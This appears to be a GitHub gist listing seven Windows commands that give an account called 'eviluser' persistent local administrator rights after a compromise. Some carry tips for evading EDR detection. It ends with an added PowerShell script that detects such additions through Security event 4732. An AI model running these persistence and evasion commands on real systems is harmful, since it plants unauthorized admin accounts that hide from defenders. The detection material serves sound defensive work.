Gist: justaguywhocodes/10474ced3b773bf2409397f078d77bec
Commands to Execute (from an already-elevated context)

Every method below needs a token that already holds local admin (or SYSTEM) rights; run from a plain standard-user session, each one fails with an access-denied error. They are post-exploitation persistence commands, not privilege escalation. All of them end in the same SAM write, so whichever option is used the Security log records event 4732 (member added to a security-enabled local group) with TargetSid S-1-5-32-544; what differs between the options is how recognisable the command line is.

Option 1: Using net localgroup (most common, loudest, almost always detected by modern EDR)

```cmd
net localgroup Administrators eviluser /add
```
Option 2: Using net.exe with a domain account (adding a domain user to the local Administrators group on a domain-joined host)

```cmd
net localgroup Administrators "DOMAIN\eviluser" /add
```
Option 3: Using PowerShell Add-LocalGroupMember (very common in modern attacks; Microsoft.PowerShell.LocalAccounts module, Windows PowerShell 5.1 and later; captured by script block logging, event 4104, where that is enabled)

```powershell
Add-LocalGroupMember -Group "Administrators" -Member "eviluser"
```
Option 4: Using net user + net localgroup (create the account, then add it; produces 4720 for the account creation and 4732 for the group change, and the cleartext password lands in the 4688 command line if process command-line auditing is on)

```cmd
net user eviluser P@ssw0rd123! /add
net localgroup Administrators eviluser /add
```
Option 5: Quiet method via ADSI (the WinNT provider, not WMI as often labelled): no net.exe and no LocalAccounts cmdlet on the command line, so detections keyed on those miss it, but 4732 is still written. The member path must name the authority the account belongs to: the computer name for a local account, the domain NetBIOS name for a domain account. $env:USERDOMAIN equals the computer name only when the current logon is itself a local account, so for a local "eviluser" name the machine explicitly.

```powershell
# Local account: the authority is the computer name; use the domain NetBIOS name for a domain account
([ADSI]"WinNT://./Administrators,group").Add("WinNT://$env:COMPUTERNAME/eviluser,user")
```
Option 6: Using secedit to export, edit and re-import a security template (rarely flagged by EDRs that key on net.exe or PowerShell; the resulting 4732 is still logged). The snippet as originally written only appended a SeMachineAccountPrivilege line under [Privilege Rights], which is a user-rights assignment and never touches group membership, and it omitted the re-import that actually applies anything. The template section that changes membership is [Group Membership] (the Restricted Groups mechanism), and applying it with secedit /configure replaces the group's entire member list with what the template lists, so any existing member left out is removed; that is why this route is rarely used for a single add. One more trap: secedit /export writes the file as UTF-16, so appending with cmd echo produces a mixed-encoding file that secedit rejects; write the additions as Unicode.

```cmd
secedit /export /cfg secpol.cfg
REM append the Restricted Groups section in Unicode; list every member that must remain, not just the new one
powershell -c "Add-Content -Encoding Unicode secpol.cfg -Value '[Group Membership]','*S-1-5-32-544__Members = Administrator,eviluser'"
secedit /configure /db %TEMP%\secpol.sdb /cfg secpol.cfg /areas GROUP_MGMT
```
Option 7: Using Add-LocalGroupMember with the group SID (slightly more stealthy: the string "Administrators" never appears on the command line, which beats detections that match the group name, and it also works on localized Windows builds where the group carries a different name; 4732 is still logged with TargetSid S-1-5-32-544)

```powershell
Add-LocalGroupMember -SID "S-1-5-32-544" -Member "eviluser"
```
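The seven options differ only in what appears on the command line; every one of them ends in the same SAM write, so the durable detection is the Security event rather than the tool. The PowerShell below is an added example, not part of the gist: it pulls 4732 events for the Administrators group by SID, resolves the member from MemberSid (for local groups the MemberName field is usually "-", so matching on the name misses most of these), and separately diffs live membership against a baseline list you supply. The baseline value in the usage lines is an assumption for illustration. It needs an elevated prompt, and 4732 only exists if the "Security Group Management" audit subcategory is enabled for Success (check with auditpol /get /subcategory:"Security Group Management").

```powershell
# Added example (not from the gist). Detects local Administrators additions from the
# Security log regardless of which command performed them, and audits current membership.
$AdministratorsSid = 'S-1-5-32-544'

function Get-AdminGroupAdditions {
    param([datetime]$Since = (Get-Date).AddDays(-1))

    # 4732 = "A member was added to a security-enabled local group". Get-WinEvent throws
    # when nothing matches, hence SilentlyContinue.
    $events = Get-WinEvent -FilterHashtable @{
        LogName = 'Security'; Id = 4732; StartTime = $Since
    } -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # Pull the EventData fields out of the event XML by name
        $xml = [xml]$e.ToXml()
        $d = @{}
        foreach ($node in $xml.Event.EventData.Data) { $d[$node.Name] = $node.'#text' }

        # Filter on the group SID, not its name, so localized group names and
        # Option 7 style SID-based adds are both caught
        if ($d['TargetSid'] -ne $AdministratorsSid) { continue }

        # MemberName is typically '-' for local groups; resolve MemberSid instead
        $member = $d['MemberName']
        if (-not $member -or $member -eq '-') {
            try {
                $member = ([System.Security.Principal.SecurityIdentifier]$d['MemberSid']).
                    Translate([System.Security.Principal.NTAccount]).Value
            } catch { $member = $d['MemberSid'] }   # deleted or unresolvable account
        }

        [pscustomobject]@{
            Time           = $e.TimeCreated
            Member         = $member
            MemberSid      = $d['MemberSid']
            AddedBy        = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            SubjectLogonId = $d['SubjectLogonId']   # join to 4624/4688 to find the process
        }
    }
}

function Compare-AdminMembership {
    # Returns members present now that are absent from the supplied baseline (COMPUTER\name form)
    param([Parameter(Mandatory)][string[]]$Baseline)
    $current = Get-LocalGroupMember -SID $AdministratorsSid | Select-Object -ExpandProperty Name
    Compare-Object -ReferenceObject $Baseline -DifferenceObject $current |
        Where-Object SideIndicator -eq '=>' |
        ForEach-Object { $_.InputObject }
}

# Usage (baseline is an assumed example value)
Get-AdminGroupAdditions -Since (Get-Date).AddHours(-6) | Format-Table -AutoSize
Compare-AdminMembership -Baseline @("$env:COMPUTERNAME\Administrator")
```

SubjectLogonId is the pivot worth keeping: the same logon ID appears on the 4688 process-creation event (and on Sysmon event 1) for whichever of net.exe, powershell.exe or a custom ADSI caller performed the add, which is how the "quiet" options get tied back to a process without relying on their command line.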